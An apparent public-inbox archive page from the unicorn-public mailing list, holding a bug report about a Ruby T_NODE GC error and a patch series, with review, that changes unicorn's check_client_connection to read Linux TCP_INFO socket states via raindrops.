From: Eric Wong @ 2017-07-13 19:34 UTC (permalink / raw)
  To: Pere Joan Martorell
  Cc: unicorn-public, Philip Cunningham, Jonathan del Strother

+Cc: Philip and Jonathan  since they encountered this three years
ago, but we never heard back from them:

	https://bogomips.org/unicorn-public/?q=T_NODE+d:..20170713


Pere Joan Martorell <pere.joan@camaloon.com> wrote:
> > /home/deployer/.rbenv/versions/2.4.1/lib/ruby/gems/2.4.0/gems/unicorn-5.3.0/lib/unicorn/http_request.rb:80:in `parse': method `hash' called on unexpected T_NODE object (0x0055b15b973508 flags=0xaa31b) (NotImplementedError)

> Any idea what is happening?

This is most likely a bug in a C extension not using write
barriers correctly (perhaps via undocumented C-API functions in
Ruby).

I don't think I've seen this on ruby-core bug reports in a few years:

	https://public-inbox.org/ruby-core/?q=T_NODE

Fwiw, Appendix D on Generational GC in the Ruby source is
worth reading to any C extension authors:

	https://80x24.org/mirrors/ruby.git/plain/doc/extension.rdoc

There are probably build warnings when using some dangerous methods/macros,
maybe you can check build logs for const warnings.


Can you share the list of RubyGems you have loaded and maybe try
upgrading/replacing/eliminating the ones with C extensions
one-by-one until the error stops?

Also, perhaps the output of "pmap $PID_OF_WORKER" if you're on
Linux (or equivalent command if you're on another OS).

Anyways, I didn't notice anything suspicious in your config.

I'll do another self-audit of the unicorn + kgio + raindrops
extensions, too, but judging from the lack of reports and how
much they get used; I suspect the bug is elsewhere (more eyes
welcome, of course).

Thanks for the report and any more info you can provide!

^ permalink raw reply	[relevance 5%]

* Re: [PATCH] check_client_connection: use tcp state on linux
  2017-03-06 21:32  2%           ` Simon Eskildsen
@ 2017-03-07 22:50  0%             ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-03-07 22:50 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public, Aman Gupta

Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
> Here's another update Eric!

Thanks, a few teeny issues fixed up locally (but commented
inline, below).

However, there's a bigger problem which I'm Cc:-ing Aman about
for tmm1/gctools changing process_client in the internal API.

I won't burden him maintaining extra versions, nor will I force
users to use a certain version of unicorn or gctools to match.

Aman: for reference, relevant messages in the archives:

https://bogomips.org/unicorn-public/?q=d:20170222-+check_client_connection&x=t

(TL;DR: I don't expect Aman will have to do anything,
 just keeping him in the loop)

> +++ b/lib/unicorn/http_server.rb
> @@ -558,8 +558,8 @@ def e100_response_write(client, env)
> 
>    # once a client is accepted, it is processed in its entirety here
>    # in 3 easy steps: read request, call app, write app response
> -  def process_client(client)
> -    status, headers, body = @app.call(env = @request.read(client))
> +  def process_client(client, listener)
> +    status, headers, body = @app.call(env = @request.read(client, listener))

I can squash this fix in, locally:

diff --git a/lib/unicorn/oob_gc.rb b/lib/unicorn/oob_gc.rb
index 5572e59..74a1d51 100644
--- a/lib/unicorn/oob_gc.rb
+++ b/lib/unicorn/oob_gc.rb
@@ -67,8 +67,8 @@ def self.new(app, interval = 5, path = %r{\A/})
 
   #:stopdoc:
   PATH_INFO = "PATH_INFO"
-  def process_client(client)
-    super(client) # Unicorn::HttpServer#process_client
+  def process_client(client, listener)
+    super(client, listener) # Unicorn::HttpServer#process_client
     if OOBGC_PATH =~ OOBGC_ENV[PATH_INFO] && ((@@nr -= 1) <= 0)
       @@nr = OOBGC_INTERVAL
       OOBGC_ENV.clear

However, https://github.com/tmm1/gctools also depends on this
undocumented internal API of ours; and I will not consider
breaking it for release...

Pushed to the "ccc-tcp" branch @ git://bogomips.org/unicorn
(commit beaee769c6553bf4e0260be2507b8235f0aa764f)

>      begin
>        return if @request.hijacked?
> @@ -655,7 +655,7 @@ def worker_loop(worker)
>          # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
>          # but that will return false
>          if client = sock.kgio_tryaccept
> -          process_client(client)
> +          process_client(client, sock)
>            nr += 1
>            worker.tick = time_now.to_i
>          end


> @@ -28,6 +29,7 @@ class Unicorn::HttpParser
>    # Drop these frozen strings when Ruby 2.2 becomes more prevalent,
>    # 2.2+ optimizes hash assignments when used with literal string keys
>    HTTP_RESPONSE_START = [ 'HTTP', '/1.1 ']
> +  EMPTY_ARRAY = [].freeze

(minor) this was made before commit e06b699683738f22
("http_request: freeze constant strings passed IO#write")
but I've trivially fixed it up, locally.

> +    def check_client_connection(socket, listener) # :nodoc:
> +      if Kgio::TCPServer === listener
> +        @@tcp_info ||= Raindrops::TCP_Info.new(socket)
> +        @@tcp_info.get!(socket)
> +        raise Errno::EPIPE, "client closed connection".freeze,
> EMPTY_ARRAY if closed_state?(@@tcp_info.state)

(minor) I needed to wrap that line since I use gigantic fonts
(fixed up locally)

^ permalink raw reply related	[relevance 0%]

* Re: [PATCH] check_client_connection: use tcp state on linux
  @ 2017-03-06 21:32  2%           ` Simon Eskildsen
  2017-03-07 22:50  0%             ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Simon Eskildsen @ 2017-03-06 21:32 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Here's another update Eric!

* Use a frozen empty array and a class variable for TCP_Info to avoid
garbage. As far as I can tell, this shouldn't result in any garbage on
any requests (other than on the first request).
* Pass listener socket to #read to only check the client connection on
a TCP server.
* Short-circuit CLOSE_WAIT right after ESTABLISHED since in my testing
it's the most common state after ESTABLISHED; that leaves the numbers
un-ordered, but the comment should make it OK.
* Definition of `check_client_connection` based on whether
Raindrops::TCP_Info is defined, instead of the class variable
approach.
* Changed the unit tests to pass a `nil` listener.

Tested on our staging environment, and still works like a dream.

I should note that I got the idea behind this patch into Puma as well!

https://github.com/puma/puma/pull/1227


---
 lib/unicorn/http_request.rb | 44 ++++++++++++++++++++++++++++++++++++++------
 lib/unicorn/http_server.rb  |  6 +++---
 test/unit/test_request.rb   | 28 ++++++++++++++--------------
 3 files changed, 55 insertions(+), 23 deletions(-)

diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index 0c1f9bb..21a99ef 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -2,6 +2,7 @@
 # :enddoc:
 # no stable API here
 require 'unicorn_http'
+require 'raindrops'

 # TODO: remove redundant names
 Unicorn.const_set(:HttpRequest, Unicorn::HttpParser)
@@ -28,6 +29,7 @@ class Unicorn::HttpParser
   # Drop these frozen strings when Ruby 2.2 becomes more prevalent,
   # 2.2+ optimizes hash assignments when used with literal string keys
   HTTP_RESPONSE_START = [ 'HTTP', '/1.1 ']
+  EMPTY_ARRAY = [].freeze
   @@input_class = Unicorn::TeeInput
   @@check_client_connection = false

@@ -62,7 +64,7 @@ def self.check_client_connection=(bool)
   # returns an environment hash suitable for Rack if successful
   # This does minimal exception trapping and it is up to the caller
   # to handle any socket errors (e.g. user aborted upload).
-  def read(socket)
+  def read(socket, listener)
     clear
     e = env

@@ -83,11 +85,7 @@ def read(socket)
       false until add_parse(socket.kgio_read!(16384))
     end

-    # detect if the socket is valid by writing a partial response:
-    if @@check_client_connection && headers?
-      self.response_start_sent = true
-      HTTP_RESPONSE_START.each { |c| socket.write(c) }
-    end
+    check_client_connection(socket, listener) if @@check_client_connection

     e['rack.input'] = 0 == content_length ?
                       NULL_IO : @@input_class.new(socket, self)
@@ -108,4 +106,38 @@ def call
   def hijacked?
     env.include?('rack.hijack_io'.freeze)
   end
+
+  if defined?(Raindrops::TCP_Info)
+    def check_client_connection(socket, listener) # :nodoc:
+      if Kgio::TCPServer === listener
+        @@tcp_info ||= Raindrops::TCP_Info.new(socket)
+        @@tcp_info.get!(socket)
+        raise Errno::EPIPE, "client closed connection".freeze,
EMPTY_ARRAY if closed_state?(@@tcp_info.state)
+      else
+        write_http_header(socket)
+      end
+    end
+
+    def closed_state?(state) # :nodoc:
+      case state
+      when 1 # ESTABLISHED
+        false
+      when 8, 6, 7, 9, 11 # CLOSE_WAIT, TIME_WAIT, CLOSE, LAST_ACK, CLOSING
+        true
+      else
+        false
+      end
+    end
+  else
+    def check_client_connection(socket, listener) # :nodoc:
+      write_http_header(socket)
+    end
+  end
+
+  def write_http_header(socket) # :nodoc:
+    if headers?
+      self.response_start_sent = true
+      HTTP_RESPONSE_START.each { |c| socket.write(c) }
+    end
+  end
 end
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 35bd100..4190641 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -558,8 +558,8 @@ def e100_response_write(client, env)

   # once a client is accepted, it is processed in its entirety here
   # in 3 easy steps: read request, call app, write app response
-  def process_client(client)
-    status, headers, body = @app.call(env = @request.read(client))
+  def process_client(client, listener)
+    status, headers, body = @app.call(env = @request.read(client, listener))

     begin
       return if @request.hijacked?
@@ -655,7 +655,7 @@ def worker_loop(worker)
         # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
         # but that will return false
         if client = sock.kgio_tryaccept
-          process_client(client)
+          process_client(client, sock)
           nr += 1
           worker.tick = time_now.to_i
         end
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index f0ccaf7..dbe8af7 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -30,7 +30,7 @@ def setup
   def test_options
     client = MockRequest.new("OPTIONS * HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal '', env['REQUEST_PATH']
     assert_equal '', env['PATH_INFO']
     assert_equal '*', env['REQUEST_URI']
@@ -40,7 +40,7 @@ def test_options
   def test_absolute_uri_with_query
     client = MockRequest.new("GET http://e:3/x?y=z HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal 'y=z', env['QUERY_STRING']
@@ -50,7 +50,7 @@ def test_absolute_uri_with_query
   def test_absolute_uri_with_fragment
     client = MockRequest.new("GET http://e:3/x#frag HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal '', env['QUERY_STRING']
@@ -61,7 +61,7 @@ def test_absolute_uri_with_fragment
   def test_absolute_uri_with_query_and_fragment
     client = MockRequest.new("GET http://e:3/x?a=b#frag HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal 'a=b', env['QUERY_STRING']
@@ -73,7 +73,7 @@ def test_absolute_uri_unsupported_schemes
     %w(ssh+http://e/ ftp://e/x http+ssh://e/x).each do |abs_uri|
       client = MockRequest.new("GET #{abs_uri} HTTP/1.1\r\n" \
                                "Host: foo\r\n\r\n")
-      assert_raises(HttpParserError) { @request.read(client) }
+      assert_raises(HttpParserError) { @request.read(client, nil) }
     end
   end

@@ -81,7 +81,7 @@ def test_x_forwarded_proto_https
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: https\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal "https", env['rack.url_scheme']
     res = @lint.call(env)
   end
@@ -90,7 +90,7 @@ def test_x_forwarded_proto_http
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: http\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal "http", env['rack.url_scheme']
     res = @lint.call(env)
   end
@@ -99,14 +99,14 @@ def test_x_forwarded_proto_invalid
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: ftp\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal "http", env['rack.url_scheme']
     res = @lint.call(env)
   end

   def test_rack_lint_get
     client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal "http", env['rack.url_scheme']
     assert_equal '127.0.0.1', env['REMOTE_ADDR']
     res = @lint.call(env)
@@ -114,7 +114,7 @@ def test_rack_lint_get

   def test_no_content_stringio
     client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal StringIO, env['rack.input'].class
   end

@@ -122,7 +122,7 @@ def test_zero_content_stringio
     client = MockRequest.new("PUT / HTTP/1.1\r\n" \
                              "Content-Length: 0\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal StringIO, env['rack.input'].class
   end

@@ -130,7 +130,7 @@ def test_real_content_not_stringio
     client = MockRequest.new("PUT / HTTP/1.1\r\n" \
                              "Content-Length: 1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert_equal Unicorn::TeeInput, env['rack.input'].class
   end

@@ -141,7 +141,7 @@ def test_rack_lint_put
       "Content-Length: 5\r\n" \
       "\r\n" \
       "abcde")
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert ! env.include?(:http_body)
     res = @lint.call(env)
   end
@@ -167,7 +167,7 @@ def client.kgio_read!(*args)
       "\r\n")
     count.times { assert_equal bs, client.syswrite(buf) }
     assert_equal 0, client.sysseek(0)
-    env = @request.read(client)
+    env = @request.read(client, nil)
     assert ! env.include?(:http_body)
     assert_equal length, env['rack.input'].size
     count.times {
-- 
2.11.0

On Tue, Feb 28, 2017 at 10:18 PM, Eric Wong <e@80x24.org> wrote:
>> Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
>> > +      tcp_info = Raindrops::TCP_Info.new(socket)
>> > +      raise Errno::EPIPE, "client closed connection".freeze, [] if
>> > closed_state?(tcp_info.state)
>
> Also, I guess if you're using this frequently, it might make
> sense to keep the tcp_info object around and recycle it
> using the Raindrops::TCP_Info#get! method.
>
> #get! has always been supported in raindrops, but I just noticed
> RDoc wasn't picking it up properly :x
>
> Anyways I've fixed the documentation over on the raindrops list
>
>   https://bogomips.org/raindrops-public/20170301025541.26183-1-e@80x24.org/
>   ("[PATCH] ext: fix documentation for C ext-defined classes")
>
>   https://bogomips.org/raindrops-public/20170301025546.26233-1-e@80x24.org/
>   ("[PATCH] TCP_Info: custom documentation for #get!")
>
> ... and updated the RDoc on https://bogomips.org/raindrops/
>
> Heck, I wonder if it even makes sense to reuse a frozen empty
> Array when raising the exception...

^ permalink raw reply related	[relevance 2%]

* Re: [PATCH] check_client_connection: use tcp state on linux
  2017-02-25 16:19  0% ` Simon Eskildsen
@ 2017-02-25 23:12  0%   ` Eric Wong
    0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-02-25 23:12 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public

Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
 
> On Sat, Feb 25, 2017 at 9:03 AM, Simon Eskildsen
> <simon.eskildsen@shopify.com> wrote:
> > The implementation of the check_client_connection causing an early write is
> > ineffective when not performed on loopback. In my testing, when on non-loopback,
> > such as another host, we only see a 10-20% rejection rate with TCP_NODELAY of
> > clients that are closed. This means 90-80% of responses in this case are
> > rendered in vain.
> >
> > This patch uses getsockopt(2) with TCP_INFO on Linux to read the socket state.
> > If the socket is in a state where it doesn't take a response, we'll abort the
> > request with an error similar to what write(2) would give us on a closed
> > socket.
> >
> > In my testing, this has a 100% rejection rate. This testing was conducted with
> > the following script:

Good to know!

> > diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
> > index 0c1f9bb..b4c95fc 100644
> > --- a/lib/unicorn/http_request.rb
> > +++ b/lib/unicorn/http_request.rb
> > @@ -31,6 +31,9 @@ class Unicorn::HttpParser
> >    @@input_class = Unicorn::TeeInput
> >    @@check_client_connection = false
> >
> > +  # TCP_TIME_WAIT: 6, TCP_CLOSE: 7, TCP_CLOSE_WAIT: 8, TCP_LAST_ACK: 9
> > +  IGNORED_CHECK_CLIENT_SOCKET_STATES = (6..9)

Thanks for documenting the numbers.

I prefer we use a hash or case statement.  Both allow more
optimization in the YARV VM of CRuby (opt_aref and
opt_case_dispatch in insns.def).  case _might_ be a little
faster if there's no constant lookup overhead, but 
a microbench or dumping the bytecode will be necessary
to be sure :)

A hash or a case can also help portability-wise in case
we hit a system where these numbers are non-sequential;
or if we forgot something.
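A minimal sketch of the case-statement alternative suggested here, for
illustration only: the state numbers are the Linux values documented in
the patch, while the constant and method names are illustrative, not
unicorn's actual API.

```ruby
# Linux TCP state numbers quoted in the patch above:
TCP_TIME_WAIT  = 6
TCP_CLOSE      = 7
TCP_CLOSE_WAIT = 8
TCP_LAST_ACK   = 9

# A case dispatch works even if a platform numbers these states
# non-sequentially, unlike Range#cover?:
def closed_state?(state)
  case state
  when TCP_TIME_WAIT, TCP_CLOSE, TCP_CLOSE_WAIT, TCP_LAST_ACK
    true
  else
    false
  end
end
```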

> > -    # detect if the socket is valid by writing a partial response:
> > -    if @@check_client_connection && headers?
> > -      self.response_start_sent = true
> > -      HTTP_RESPONSE_START.each { |c| socket.write(c) }
> > +    # detect if the socket is valid by checking client connection.
> > +    if @@check_client_connection

We can probably split everything inside this if to a new
method, this avoid penalizing people who don't use this feature.
Using check_client_connection will already have a high cost,
since it requires at least one extra syscall.

> > +      if defined?(Raindrops::TCP_Info)

...because defined? only needs to be checked once for the
lifetime of the process; we can define different methods
at load time to avoid the check for each and every request.
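The load-time dispatch described here can be sketched as follows: the
`defined?` check runs once when the file is loaded, and only the matching
method body is defined. The module and method names are hypothetical;
unicorn's real implementation differs.

```ruby
module CheckClient
  if defined?(Raindrops::TCP_Info)
    # Defined only on platforms where raindrops exposes TCP_Info:
    def check_client_connection(socket)
      :tcp_info # the TCP_INFO-based state check would live here
    end
  else
    # Fallback defined everywhere else, no per-request defined? cost:
    def check_client_connection(socket)
      :early_write # the old partial-write hack would live here
    end
  end
end
```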

> > +        tcp_info = Raindrops::TCP_Info.new(socket)
> > +        if IGNORED_CHECK_CLIENT_SOCKET_STATES.cover?(tcp_info.state)
> > +          socket.close

Right, no need to socket.close, here; handle_error does it.

> > +          raise Errno::EPIPE

Since we don't print out the backtrace in handle_error, we
can raise without a backtrace to avoid excess garbage.
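The no-backtrace raise looks like this: passing an empty array as the
third argument to Kernel#raise suppresses backtrace construction and the
garbage that comes with it.

```ruby
begin
  # Third argument sets the backtrace explicitly; [] means no frames
  # are captured, so no backtrace strings are allocated:
  raise Errno::EPIPE, "client closed connection", []
rescue Errno::EPIPE => e
  e.backtrace # => []
end
```

A frozen, shared empty array (as mused about elsewhere in this thread) would avoid even the per-raise `[]` allocation.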

> > +        end
> > +      elsif headers?
> > +        self.response_start_sent = true
> > +        HTTP_RESPONSE_START.each { |c| socket.write(c) }
> > +      end
> >      end

> I left out a TCPSocket check, we'll need a `socket.is_a?(TCPSocket)`
> in there. I'll wait with sending an updated patch in case you have
> other comments. I'm also not entirely sure we need the `socket.close`.
> What do you think?

Yep, we need to account for the UNIX socket case.  I forget if
kgio even makes them different...

Anyways I won't be online much for a few days, and it's the
weekend, so no rush :)

Thanks.

^ permalink raw reply	[relevance 0%]

* Re: [PATCH] check_client_connection: use tcp state on linux
  2017-02-25 14:03  4% [PATCH] check_client_connection: use tcp state on linux Simon Eskildsen
@ 2017-02-25 16:19  0% ` Simon Eskildsen
  2017-02-25 23:12  0%   ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Simon Eskildsen @ 2017-02-25 16:19 UTC (permalink / raw)
  To: unicorn-public

I left out a TCPSocket check, we'll need a `socket.is_a?(TCPSocket)`
in there. I'll wait with sending an updated patch in case you have
other comments. I'm also not entirely sure we need the `socket.close`.
What do you think?

On Sat, Feb 25, 2017 at 9:03 AM, Simon Eskildsen
<simon.eskildsen@shopify.com> wrote:
> The implementation of the check_client_connection causing an early write is
> ineffective when not performed on loopback. In my testing, when on non-loopback,
> such as another host, we only see a 10-20% rejection rate with TCP_NODELAY of
> clients that are closed. This means 80-90% of responses in this case are
> rendered in vain.
>
> This patch uses getsockopt(2) with TCP_INFO on Linux to read the socket state.
> If the socket is in a state where it doesn't take a response, we'll abort the
> request with an error similar to what write(2) would give us on a closed
> socket.
>
> In my testing, this has a 100% rejection rate. This testing was conducted with
> the following script:
>
> 100.times do |i|
>   client = TCPSocket.new("some-unicorn", 20_000)
>   client.write("GET /collections/#{rand(10000)} HTTP/1.1\r\n" \
>     "Host:walrusser.myshopify.com\r\n\r\n")
>   client.close
> end
> ---
>  lib/unicorn/http_request.rb | 19 +++++++++++++++----
>  1 file changed, 15 insertions(+), 4 deletions(-)
>
> diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
> index 0c1f9bb..b4c95fc 100644
> --- a/lib/unicorn/http_request.rb
> +++ b/lib/unicorn/http_request.rb
> @@ -31,6 +31,9 @@ class Unicorn::HttpParser
>    @@input_class = Unicorn::TeeInput
>    @@check_client_connection = false
>
> +  # TCP_TIME_WAIT: 6, TCP_CLOSE: 7, TCP_CLOSE_WAIT: 8, TCP_LAST_ACK: 9
> +  IGNORED_CHECK_CLIENT_SOCKET_STATES = (6..9)
> +
>    def self.input_class
>      @@input_class
>    end
> @@ -83,10 +86,18 @@ def read(socket)
>        false until add_parse(socket.kgio_read!(16384))
>      end
>
> -    # detect if the socket is valid by writing a partial response:
> -    if @@check_client_connection && headers?
> -      self.response_start_sent = true
> -      HTTP_RESPONSE_START.each { |c| socket.write(c) }
> +    # detect if the socket is valid by checking client connection.
> +    if @@check_client_connection
> +      if defined?(Raindrops::TCP_Info)
> +        tcp_info = Raindrops::TCP_Info.new(socket)
> +        if IGNORED_CHECK_CLIENT_SOCKET_STATES.cover?(tcp_info.state)
> +          socket.close
> +          raise Errno::EPIPE
> +        end
> +      elsif headers?
> +        self.response_start_sent = true
> +        HTTP_RESPONSE_START.each { |c| socket.write(c) }
> +      end
>      end
>
>      e['rack.input'] = 0 == content_length ?
> --
> 2.11.0

^ permalink raw reply	[relevance 0%]

* [PATCH] check_client_connection: use tcp state on linux
@ 2017-02-25 14:03  4% Simon Eskildsen
  2017-02-25 16:19  0% ` Simon Eskildsen
  0 siblings, 1 reply; 200+ results
From: Simon Eskildsen @ 2017-02-25 14:03 UTC (permalink / raw)
  To: unicorn-public

The implementation of the check_client_connection causing an early write is
ineffective when not performed on loopback. In my testing, when on non-loopback,
such as another host, we only see a 10-20% rejection rate with TCP_NODELAY of
clients that are closed. This means 80-90% of responses in this case are
rendered in vain.

This patch uses getsockopt(2) with TCP_INFO on Linux to read the socket state.
If the socket is in a state where it doesn't take a response, we'll abort the
request with an error similar to what write(2) would give us on a closed
socket.

In my testing, this has a 100% rejection rate. This testing was conducted with
the following script:

100.times do |i|
  client = TCPSocket.new("some-unicorn", 20_000)
  client.write("GET /collections/#{rand(10000)} HTTP/1.1\r\n" \
    "Host:walrusser.myshopify.com\r\n\r\n")
  client.close
end
---
 lib/unicorn/http_request.rb | 19 +++++++++++++++----
 1 file changed, 15 insertions(+), 4 deletions(-)

diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index 0c1f9bb..b4c95fc 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -31,6 +31,9 @@ class Unicorn::HttpParser
   @@input_class = Unicorn::TeeInput
   @@check_client_connection = false

+  # TCP_TIME_WAIT: 6, TCP_CLOSE: 7, TCP_CLOSE_WAIT: 8, TCP_LAST_ACK: 9
+  IGNORED_CHECK_CLIENT_SOCKET_STATES = (6..9)
+
   def self.input_class
     @@input_class
   end
@@ -83,10 +86,18 @@ def read(socket)
       false until add_parse(socket.kgio_read!(16384))
     end

-    # detect if the socket is valid by writing a partial response:
-    if @@check_client_connection && headers?
-      self.response_start_sent = true
-      HTTP_RESPONSE_START.each { |c| socket.write(c) }
+    # detect if the socket is valid by checking client connection.
+    if @@check_client_connection
+      if defined?(Raindrops::TCP_Info)
+        tcp_info = Raindrops::TCP_Info.new(socket)
+        if IGNORED_CHECK_CLIENT_SOCKET_STATES.cover?(tcp_info.state)
+          socket.close
+          raise Errno::EPIPE
+        end
+      elsif headers?
+        self.response_start_sent = true
+        HTTP_RESPONSE_START.each { |c| socket.write(c) }
+      end
     end

     e['rack.input'] = 0 == content_length ?
-- 
2.11.0

^ permalink raw reply related	[relevance 4%]

* Re: check_client_connection using getsockopt(2)
  2017-02-23  2:42  0%       ` Simon Eskildsen
@ 2017-02-23  3:52  5%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-02-23  3:52 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public, raindrops-public

Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
> On Wed, Feb 22, 2017 at 8:42 PM, Eric Wong <e@80x24.org> wrote:
> > Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
> >> I meant to ask, in Raindrops why do you use the netlink API to get the
> >> socket backlog instead of `getsockopt(2)` with `TCP_INFO` to get
> >> `tcpi_unacked`? (as described in
> >> http://www.ryanfrantz.com/posts/apache-tcp-backlog/) We use this to
> >> monitor socket backlogs with a sidekick Ruby daemon. Although we're
> >> looking to replace it with a middleware to simplify for Kubernetes.
> >> It's one of our main metrics for monitoring performance, especially
> >> around deploys.
> >
> > The netlink API allows independently-spawned processes to
> > monitor others; so it can be system-wide.  TCP_INFO requires the
> > process doing the checking to also have the socket open.
> >
> > I guess this reasoning for using netlink is invalid for containers,
> > though...
> 
> If you namespace the network it's problematic, yeah. I'm considering
> right now putting Raindrops in a middleware with the netlink API
> inside the container, but it feels weird. That said, if you consider
> the alternative of using `getsockopt(2)` on the listening socket, I
> don't know how you'd get access to the Unicorn listening socket from a
> middleware. Would it be nuts to expose a hook in Unicorn that allows
> periodic execution for monitoring listening stats from Raindrops on
> the listening socket? It seems somewhat of a narrow use-case, but on
> the other hand I'm also not a fan of doing
> `Raindrops::Linux.tcp_listener_stats("localhost:#{ENV["PORT"]}")`, but
> that might be less ugly.

Yeah, all options get pretty ugly since Rack doesn't expose that
in a standardized way.  Unicorn::HttpServer::LISTENERS is a
historical constant which stores all listeners used by some
parts of raindrops.

Maybe relying on ObjectSpace or walking the LISTEN_FDS env from
systemd is acceptable for other servers *shrug*


Another way might be to rely on tcpi_last_data_recv in struct
tcp_info from each and every client socket.  That should tell
you when a client stopped writing to the socket, which works for
most HTTP requests.  You could use the same getsockopt() call
you'd use for check_client_connection to read that field.

However, this won't be visible until the client is accept()ed.

raindrops actually has some support for this, but it was
ugly, too (hooking into *accept* methods):
https://bogomips.org/raindrops/Raindrops/LastDataRecv.html

Perhaps refinements could be used, nowadays (I've never used
them).  Just throwing options out there...


In any case, what I definitely do not want is to introduced more
specialized configuration or API which might lock people into
unicorn or having to burden people with versioning incompatibilies.

> > (*) So I've been wondering if adding a "unicorn-mode" to an
> >     existing C10K, slow-client-capable Ruby/Rack server +
> >     reverse proxy makes sense for containerized deploys.
> >     Maybe...
> 
> I'd love to hear more about this idea. What are you contemplating?

Maybe another time, and not on the unicorn list.  I don't feel
comfortable writing about unrelated/tangential projects on the
unicorn list, even if I'm the leader of both projects.  Anyways,
this other server is also in the rack README.md and I've been
announcing it on ruby-talk since 2013.

^ permalink raw reply	[relevance 5%]

* Re: check_client_connection using getsockopt(2)
  2017-02-23  1:42  4%     ` Eric Wong
@ 2017-02-23  2:42  0%       ` Simon Eskildsen
  2017-02-23  3:52  5%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Simon Eskildsen @ 2017-02-23  2:42 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public, raindrops-public

On Wed, Feb 22, 2017 at 8:42 PM, Eric Wong <e@80x24.org> wrote:
> Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
>
> <snip> Thanks for the writeup!
>
> Another sidenote: It seems nginx <-> unicorn is a bit odd
> for deployment in a containerized environment(*).
>
>> I meant to ask, in Raindrops why do you use the netlink API to get the
>> socket backlog instead of `getsockopt(2)` with `TCP_INFO` to get
>> `tcpi_unacked`? (as described in
>> http://www.ryanfrantz.com/posts/apache-tcp-backlog/) We use this to
>> monitor socket backlogs with a sidekick Ruby daemon. Although we're
>> looking to replace it with a middleware to simplify for Kubernetes.
>> It's one of our main metrics for monitoring performance, especially
>> around deploys.
>
> The netlink API allows independently-spawned processes to
> monitor others; so it can be system-wide.  TCP_INFO requires the
> process doing the checking to also have the socket open.
>
> I guess this reasoning for using netlink is invalid for containers,
> though...

If you namespace the network it's problematic, yeah. I'm considering
right now putting Raindrops in a middleware with the netlink API
inside the container, but it feels weird. That said, if you consider
the alternative of using `getsockopt(2)` on the listening socket, I
don't know how you'd get access to the Unicorn listening socket from a
middleware. Would it be nuts to expose a hook in Unicorn that allows
periodic execution for monitoring listening stats from Raindrops on
the listening socket? It seems somewhat of a narrow use-case, but on
the other hand I'm also not a fan of doing
`Raindrops::Linux.tcp_listener_stats("localhost:#{ENV["PORT"]}")`, but
that might be less ugly.

>
>> I was going to use `env["unicorn.socket"]`/`env["puma.socket"]`, but
>> you could also do `env.delete("hijack_io")` after hijacking to allow
>> Unicorn to still render the response. Unfortunately the
>> `<webserver>.socket` key is not part of the Rack standard, so I'm
>> hesitant to use it. When this gets into Unicorn I'm planning to
>> propose it upstream to Puma as well.
>
> I was going to say env.delete("rack.hijack_io") is dangerous
> (since env could be copied by middleware); but apparently not:
> rack.hijack won't work with a copied env, either.
> You only need to delete with the same env object you call
> rack.hijack with.
>
> But calling rack.hijack followed by env.delete may still
